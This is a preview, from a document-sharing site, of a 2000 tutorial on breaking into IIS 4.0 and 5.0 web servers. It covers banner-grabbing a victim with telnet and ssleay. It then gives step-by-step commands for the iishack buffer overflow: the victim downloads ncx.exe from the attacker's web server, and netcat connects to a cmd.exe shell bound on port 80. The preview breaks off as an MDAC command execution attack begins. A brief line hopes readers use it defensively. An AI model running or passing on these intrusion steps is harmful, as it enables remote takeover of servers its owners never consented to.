Technology - Hacking IIS Servers

Technology - Hacking IIS Servers - SECURING IIS by BREAKING...

Info iconThis preview shows pages 1–3. Sign up to view the full content.

View Full Document Right Arrow Icon
SECURING IIS by BREAKING ===================================================== by Mount Ararat Blossom 9/15/2000 mount_ararat_blossom@hotmail.com ===================================================== 01- Abstract I am not sure what you want to get out of this but basically this paper is intended on breaking merely IIS web servers especially versions 4.0 and 5.0 via TCP/IP over the port 80. This techniques works against even so-called secure networks just because every network even those secured ones lets HTTP connections in. ===================================================== 02- Intro Alright so you all wanna know how to break into IIS web servers? First off, you should find a cgi-scanner so that things will get easier. My personnel preferences are "whisker" by "rain forest puppy" (www.wiretrip.net/rfp). "cis" by "mnemonix" (www.cerberus-infosec.co.uk) To understand which server is running on the victim site telnet <victim> 80 GET HEAD / HTTP/1.0 and there you go with the name and the version of the web server. However some sites might run their web servers over 8080, 81, 8000, 8001, and so on. To understand SSL web servers, which provides encryption between the web server and the browser we use the tool "ssleay" s_client -connect <victim>:443 HEAD / HTTP /1.0 and here we go again. As i am writing this i am hoping that you will be able to use this to secure your web servers instead of using this to break into others. ===================================================== 03- Game Starts ========IIS HACK===== The folks at www.eeye.com, have found a vulnerability on IIS 4.0 which allows us to upload a crafted version of netcat (hacker's swiss army knife)
Background image of page 1

Info iconThis preview has intentionally blurred sections. Sign up to view the full version.

View Full DocumentRight Arrow Icon
onto victim server and binds a cmd.exe on port 80. The vulnerabliy was a bufferoverflow in .htr .idc and .stm files. The problem is with insufficient bounds checking of the names in the URL for .htr .stm and .idc files, allowing hackers to insert some backdoors to download and execute arbitrary commands on the local system as the administrator user. To hack the victim site we need iishack.exe ncx.exe (you can find these two at www.technotronic.com) plus we need a web server running at our attacking box. First off, run the web server on your attacking box and place the ncx.exe on your root directory. then run iishack.exe against the victim site c:\>iishack.exe <victim> 80 <evil_hacker>/ncx.exe Then here we go, go and get your swiss army knife, namely netcat, c:\>nc <victim> 80 ==============>>>BOOM! the command promt from the victim site suddenly appears on your box !!! D:\> or whatever it is , C;E;. .. do you want me to xplain what to do next, hey common you must be kidding ...hehe. ... =========MDAC- Local Command Execution=========== You might think that it is a years-old vulnerability, however what i see on pen-tests is that almost 40% of IIS web servers are still vulnerable to this. IIS' MDAC component has a vulnerability where an attacker can submit
Background image of page 2
Image of page 3
This is the end of the preview. Sign up to access the rest of the document.

Page1 / 8

Technology - Hacking IIS Servers - SECURING IIS by BREAKING...

This preview shows document pages 1 - 3. Sign up to view the full document.

View Full Document Right Arrow Icon
Ask a homework question - tutors are online